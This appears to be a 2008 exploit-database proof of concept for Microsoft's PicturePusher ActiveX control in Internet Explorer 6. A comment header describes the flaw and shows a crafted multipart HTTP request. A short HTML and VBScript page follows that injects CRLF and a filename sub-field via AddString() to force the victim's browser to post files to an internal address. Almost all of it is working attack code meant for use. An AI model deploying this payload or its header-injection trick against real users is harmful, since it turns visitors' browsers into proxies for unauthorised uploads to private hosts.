<!--
Microsoft PicturePusher ActiveX (PipPPush.DLL 7.00.0709) remote Cross Site File 
Upload attack POC (IE6)
by Nine:Situations:Group::pyrokinesis

bug discovered by rgod during early March 2008

tested software: Microsoft Digital Image 2006 Starter Edition
works fine against IE6, with some warnings with IE7

dll settings: 
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data 

This control allows to build highly customized POST requests against private 
upload facilities, using the browser as a proxy to bounce them and by injecting 
a filename sub-field through ex. the AddString() method

The magic packet :

POST /?aaaa=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.0) [MSN Communities Active-X Upload Control]
Host: 127.0.0.1
Content-Length: 181
Cache-Control: no-cache

-----------------------------
Content-Disposition: form-data; name="aaaa"; filename="suntzu.test" 
Content-Type: text/plain; AAAA: ""

xxxxxxxx
-------------------------------

-->
<HTML>
<OBJECT classid='clsid:507813C3-0B26-47AD-A8C0-D483C7A21FA7' id='PicturePusherControl' />
</OBJECT>
<script language='vbscript'>
    'PicturePusherControl.PostURL = "http://127.0.0.1/?aaaa=1"
    PicturePusherControl.PostURL = "http://192.168.1.1/?aaaa=1"
    PicturePusherControl.AddSeperator
    CRLF = unescape("%0d%0a")
    FormElementName="aaaa""; filename=""suntzu.test"" " + CRLF + "Content-Type: text/plain; AAAA: """
    Value="xxxxxxxx"
    'for some reason cannot do this with AddFile() method, however...
    PicturePusherControl.AddString FormElementName ,Value 
    PicturePusherControl.Post
</script>

# milw0rm.com [2008-10-08]
